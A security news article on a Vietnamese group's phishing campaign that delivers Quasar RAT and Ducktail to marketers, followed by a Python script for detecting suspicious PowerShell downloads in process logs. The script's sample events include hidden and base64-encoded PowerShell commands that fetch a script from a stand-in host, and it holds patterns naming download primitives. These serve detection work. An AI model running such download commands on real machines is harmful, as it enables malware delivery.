Marketers Targeted in Multi-Stage Malware Attack in Vietnam


Cyble Research Discovers Sophisticated Multi-Stage Malware Attack Targeting Job Seekers and Digital Marketing Professionals

The Cyble Research and Intelligence Lab (CRIL) recently uncovered a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor targeting job seekers and digital marketing professionals. The campaign uses Quasar RAT, which gives attackers complete control over compromised systems.

The attack begins with spam emails carrying phishing attachments that tempt recipients to open an archive file posing as a PDF document. Once the LNK file is executed, PowerShell commands download obfuscated scripts from external sources, which helps the attack bypass traditional detection methods.

The Vietnamese threat actor intensifies operations by disseminating Ducktail malware to digital marketing professionals and expanding its arsenal to include information stealers and remote access trojans. Leveraging Malware-as-a-Service (MaaS) frameworks, these cybercriminals create versatile and scalable campaigns.

This campaign, linked to a Vietnamese threat group, targets professionals in digital marketing, e-commerce, and performance marketing sectors, with a special focus on Meta advertising. The malware employs virtual machine evasion techniques and advanced checks to avoid detection, including inspecting file names related to virtualization software and measuring time discrepancies in systems.

Upon successful execution, the malware checks for administrative privileges, escalates privileges if needed, and ensures persistence by modifying the Windows registry. Defense evasion strategies are employed to disable event tracing and encrypt sensitive data, while the deployment of Quasar RAT allows for data theft and remote control with reduced detectability. This advanced malware campaign highlights the evolving tactics and anonymity of cyber threat actors.
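For defenders, the LNK-to-PowerShell download step described above can be hunted in process-creation telemetry. The sketch below is an added example, not code from Cyble or the article; it assumes events carry the Sysmon Event ID 1 fields `Image`, `ParentImage` and `CommandLine`, and the sample events are constructed.

```python
import base64
import re

# Download primitives typical of PowerShell one-liners (cmdlets, aliases, .NET calls).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|start-bitstransfer|"
    r"net\.webclient|downloadstring|downloadfile|downloaddata", re.I)
HIDDEN_RE = re.compile(r"\s[-/]w\w*\s+hidden", re.I)           # -w / -WindowStyle hidden
FLAG_RE = re.compile(r"\s[-/](\w+)\s+([A-Za-z0-9+/=]{16,})")   # flag followed by a blob

def decoded_payload(cmdline):
    """Return the script hidden behind -EncodedCommand (any prefix form), or ''."""
    for flag, blob in FLAG_RE.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:      # bad base64 or bad UTF-16: nothing to inspect
                return ""
    return ""

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def triage(event):
    """Return the list of reasons an event is suspicious, or None if it is not."""
    if basename(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event["CommandLine"]
    hidden_script = decoded_payload(cmd)
    reasons = []
    if DOWNLOAD_RE.search(cmd + " " + hidden_script):
        reasons.append("download")
    if hidden_script:
        reasons.append("encoded")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden-window")
    if basename(event["ParentImage"]) == "explorer.exe":
        reasons.append("user-launched")
    # Alert only on a download started from the shell, as a double-clicked shortcut does.
    return reasons if {"download", "user-launched"} <= set(reasons) else None

# Constructed sample events (not taken from the campaign).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode(
    "Invoke-WebRequest http://example.invalid/a.ps1".encode("utf-16-le")).decode()
EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://example.invalid/a.ps1"'},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -enc " + ENC},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]
```

The rule is a triage heuristic: it decodes `-EncodedCommand` payloads before matching, so a download hidden behind base64 is still seen, and it stays silent on scheduled administrative scripts that neither download nor originate from `explorer.exe`.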
